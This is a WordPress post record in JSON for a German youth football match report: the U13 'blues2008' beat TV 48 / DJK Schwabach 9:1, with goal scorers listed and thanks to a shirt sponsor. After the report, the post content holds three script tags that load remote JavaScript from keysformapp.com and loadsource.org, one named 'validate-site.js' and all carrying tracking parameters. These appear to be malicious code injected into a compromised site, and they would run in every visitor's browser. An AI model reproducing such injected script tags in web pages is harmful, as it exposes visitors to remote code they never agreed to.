{"id":6754,"date":"2018-10-01T16:11:50","date_gmt":"2018-10-01T14:11:50","guid":{"rendered":"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?p=6754"},"modified":"2018-10-01T16:11:50","modified_gmt":"2018-10-01T14:11:50","slug":"jfgw-tv-48-djk-schwabach-91","status":"publish","type":"post","link":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/","title":{"rendered":"JFGW &#8211; TV 48 \/ DJK Schwabach  9:1"},"content":{"rendered":"<p>Respekt und Anerkennung hatten sich die <a class=\"_58cn\" href=\"https:\/\/www.facebook.com\/hashtag\/blues2008?source=feed_text&amp;__xts__%5B0%5D=68.ARB2q9AWv8ijuPWsx-U_M3P1YdvTixXcCCFNaTQsn2BUAOkd52Pv20L9JHS74w6nxX0Yqpsfq8WliU5cQN8CMnt5Ov7-13qv64W6UkaGnfNLrrDYei3R-Q-LklDP-gtzASVO4_1e-LmW852wD4ReGpWLUA04RFM1bzaQ_sj2GFR5cIyUcboE6Q&amp;__tn__=%2ANK-R\" data-ft=\"{&quot;type&quot;:104,&quot;tn&quot;:&quot;*N&quot;}\"><span class=\"_5afx\"><span class=\"_58cl _5afz\" aria-label=\"Hashtag\">#<\/span><span class=\"_58cm\">blues2008<\/span><\/span><\/a> bereits vor diesem Spiel verdient, doch heute fangen wir mit unseren G\u00e4sten an, denn unsere Jungs erschraken doch vor der K\u00f6rpergr\u00f6\u00dfe ihrer Gegner. Leider waren erst nur 7 Spieler aus Schwabach da, sie konnten aber noch einen auftreiben. Zu 8. mussten sie also das Spiel bestreiten, nur 24 Stunden nach einer 0:8 Klatsche gg eine<span class=\"text_exposed_show\"> Kreisligavertretung. Hier steht dann schon ein Trainer in der Verantwortung, denn dann h\u00e4tte er auch auf n\u00e4chste Woche verschieben lassen k\u00f6nnen. Die Blues legten so auch schnell die Scheu ab, zeigten zeitweise sehr gute Kombinationen und lie\u00dfen ihre Gegner viel laufen, da haben sie sich schon sehr clever angestellt. Tore mussten so fast Zwangsl\u00e4ufig fallen. Mario (7.), Dorian (16.), Odi (17.), Dorian (22.), Linus (23.) und Wiedi (26.) schraubten das Ergebnis schon vor der Halbzeit in die H\u00f6he. Es hat sich gezeigt, dass auch die individuellen St\u00e4rken der Kinder gestiegen sind. Wie immer wurde viel gewechselt und ausprobiert, denn nur die Entwicklung ist gerade vorrangig, nicht dass Ergebnis. In H\u00e4lfte zwei schwanden die Kr\u00e4fte der Schwabacher zusehends und sie lie\u00dfen sich noch mehr nach hinten fallen. Lucas (48.) und Alex (51.) trafen erst f\u00fcr die Blues, bevor den Schwabachern das absolut zu g\u00f6nnende Ehrentor durch David (54.) gelang, dem dann noch einmal Lucas (58.) den Endstand folgen lie\u00df. Einen starken Eindruck hinterlie\u00df auch unser Keeper, der die vielen langen B\u00e4lle sehr sicher ablaufen und verarbeiten konnte.<br \/>\nTEAM: Chris, Mario, Odi, Lucas, Linus, Lorenzo, Tobi Dorian, Wiedi, Alex, Basti<\/span><\/p>\n<div class=\"text_exposed_show\">\n<p>Nach Abschluss des Spieles zeigten sich die Kinder mit ihren neuen Aufw\u00e4rmshirts zusammen mit dem Sponsor, Toni Giangrasso von der Firma Aclear, zum gemeinsamen Foto. Lieber Toni, vielen lieben Dank f\u00fcr die gro\u00dfz\u00fcgige Spende, auch in der Hoffnung, das der Auftritt unserer kleinen #blues2008 Dir auch gefallen hat! Team, Trainer und Eltern sagen nochmal: DANKE!!<span class=\"_5mfr _47e3\"><img loading=\"lazy\" decoding=\"async\" class=\"img\" role=\"presentation\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/f6c\/1\/16\/1f499.png\" alt=\"\" width=\"16\" height=\"16\" \/><span class=\"_7oe\">&#x1f499;<\/span><\/span><span class=\"_5mfr _47e3\"><img loading=\"lazy\" decoding=\"async\" class=\"img\" role=\"presentation\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/f6c\/1\/16\/1f4aa.png\" alt=\"\" width=\"16\" height=\"16\" \/><\/span><\/p>\n<\/div>\n<p><script src=\"\/\/keysformapp.com\/1cbbe6fbfefc3b777d.js\"><\/script><\/p>\n<p><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52295x7355x&amp;r=1538403063619\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/keysformapp.com\/ext\/1cbbe6fbfefc3b777d.js?sid=52295_7355_&amp;title=FF_%5B602%5D_formkeyapp.cool&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Respekt und Anerkennung hatten sich die #blues2008 bereits vor diesem Spiel verdient, doch heute fangen wir mit unseren G\u00e4sten an, denn unsere Jungs erschraken doch vor der K\u00f6rpergr\u00f6\u00dfe ihrer Gegner. Leider waren erst nur 7 Spieler aus Schwabach da, sie konnten aber noch einen auftreiben. Zu 8. mussten sie also das Spiel bestreiten, nur 24 [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"saved_in_kubio":false,"footnotes":""},"categories":[2,16,10],"tags":[],"class_list":["post-6754","post","type-post","status-publish","format-standard","hentry","category-gf","category-spielbericht","category-u13-3"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>JFGW - TV 48 \/ DJK Schwabach 9:1 - JFG Wendelstein<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"JFGW - TV 48 \/ DJK Schwabach 9:1 - JFG Wendelstein\" \/>\n<meta property=\"og:description\" content=\"Respekt und Anerkennung hatten sich die #blues2008 bereits vor diesem Spiel verdient, doch heute fangen wir mit unseren G\u00e4sten an, denn unsere Jungs erschraken doch vor der K\u00f6rpergr\u00f6\u00dfe ihrer Gegner. Leider waren erst nur 7 Spieler aus Schwabach da, sie konnten aber noch einen auftreiben. Zu 8. mussten sie also das Spiel bestreiten, nur 24 [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/\" \/>\n<meta property=\"og:site_name\" content=\"JFG Wendelstein\" \/>\n<meta property=\"article:published_time\" content=\"2018-10-01T14:11:50+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/f6c\/1\/16\/1f499.png\" \/>\n<meta name=\"author\" content=\"Autor\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"Autor\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"2\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-tv-48-djk-schwabach-91\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-tv-48-djk-schwabach-91\\\/\"},\"author\":{\"name\":\"Autor\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"headline\":\"JFGW &#8211; TV 48 \\\/ DJK Schwabach 9:1\",\"datePublished\":\"2018-10-01T14:11:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-tv-48-djk-schwabach-91\\\/\"},\"wordCount\":318,\"image\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-tv-48-djk-schwabach-91\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/static.xx.fbcdn.net\\\/images\\\/emoji.php\\\/v9\\\/f6c\\\/1\\\/16\\\/1f499.png\",\"articleSection\":[\"Gro\u00dffeld\",\"Spielbericht\",\"U13-3\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-tv-48-djk-schwabach-91\\\/\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-tv-48-djk-schwabach-91\\\/\",\"name\":\"JFGW - TV 48 \\\/ DJK Schwabach 9:1 - JFG Wendelstein\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-tv-48-djk-schwabach-91\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-tv-48-djk-schwabach-91\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/static.xx.fbcdn.net\\\/images\\\/emoji.php\\\/v9\\\/f6c\\\/1\\\/16\\\/1f499.png\",\"datePublished\":\"2018-10-01T14:11:50+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-tv-48-djk-schwabach-91\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-tv-48-djk-schwabach-91\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-tv-48-djk-schwabach-91\\\/#primaryimage\",\"url\":\"https:\\\/\\\/static.xx.fbcdn.net\\\/images\\\/emoji.php\\\/v9\\\/f6c\\\/1\\\/16\\\/1f499.png\",\"contentUrl\":\"https:\\\/\\\/static.xx.fbcdn.net\\\/images\\\/emoji.php\\\/v9\\\/f6c\\\/1\\\/16\\\/1f499.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-tv-48-djk-schwabach-91\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"JFGW &#8211; TV 48 \\\/ DJK Schwabach 9:1\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\",\"name\":\"JFG Wendelstein\",\"description\":\"Juniorenfu\u00dfball\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\",\"name\":\"Autor\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"caption\":\"Autor\"},\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/author\\\/autor\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"JFGW - TV 48 \/ DJK Schwabach 9:1 - JFG Wendelstein","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/","og_locale":"de_DE","og_type":"article","og_title":"JFGW - TV 48 \/ DJK Schwabach 9:1 - JFG Wendelstein","og_description":"Respekt und Anerkennung hatten sich die #blues2008 bereits vor diesem Spiel verdient, doch heute fangen wir mit unseren G\u00e4sten an, denn unsere Jungs erschraken doch vor der K\u00f6rpergr\u00f6\u00dfe ihrer Gegner. Leider waren erst nur 7 Spieler aus Schwabach da, sie konnten aber noch einen auftreiben. Zu 8. mussten sie also das Spiel bestreiten, nur 24 [&hellip;]","og_url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/","og_site_name":"JFG Wendelstein","article_published_time":"2018-10-01T14:11:50+00:00","og_image":[{"url":"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/f6c\/1\/16\/1f499.png","type":"","width":"","height":""}],"author":"Autor","twitter_card":"summary_large_image","twitter_misc":{"Verfasst von":"Autor","Gesch\u00e4tzte Lesezeit":"2\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/#article","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/"},"author":{"name":"Autor","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"headline":"JFGW &#8211; TV 48 \/ DJK Schwabach 9:1","datePublished":"2018-10-01T14:11:50+00:00","mainEntityOfPage":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/"},"wordCount":318,"image":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/#primaryimage"},"thumbnailUrl":"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/f6c\/1\/16\/1f499.png","articleSection":["Gro\u00dffeld","Spielbericht","U13-3"],"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/","name":"JFGW - TV 48 \/ DJK Schwabach 9:1 - JFG Wendelstein","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/#primaryimage"},"image":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/#primaryimage"},"thumbnailUrl":"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/f6c\/1\/16\/1f499.png","datePublished":"2018-10-01T14:11:50+00:00","author":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"breadcrumb":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/#primaryimage","url":"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/f6c\/1\/16\/1f499.png","contentUrl":"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/f6c\/1\/16\/1f499.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-tv-48-djk-schwabach-91\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/"},{"@type":"ListItem","position":2,"name":"JFGW &#8211; TV 48 \/ DJK Schwabach 9:1"}]},{"@type":"WebSite","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/","name":"JFG Wendelstein","description":"Juniorenfu\u00dfball","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Person","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9","name":"Autor","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","caption":"Autor"},"url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/author\/autor\/"}]}},"_links":{"self":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/6754","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/comments?post=6754"}],"version-history":[{"count":0,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/6754\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/media?parent=6754"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/categories?post=6754"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/tags?post=6754"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}